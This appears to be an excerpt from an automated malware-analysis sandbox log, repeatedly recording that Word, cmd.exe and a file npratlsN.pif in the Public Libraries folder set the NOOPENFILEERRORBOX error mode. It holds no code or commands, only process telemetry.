Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
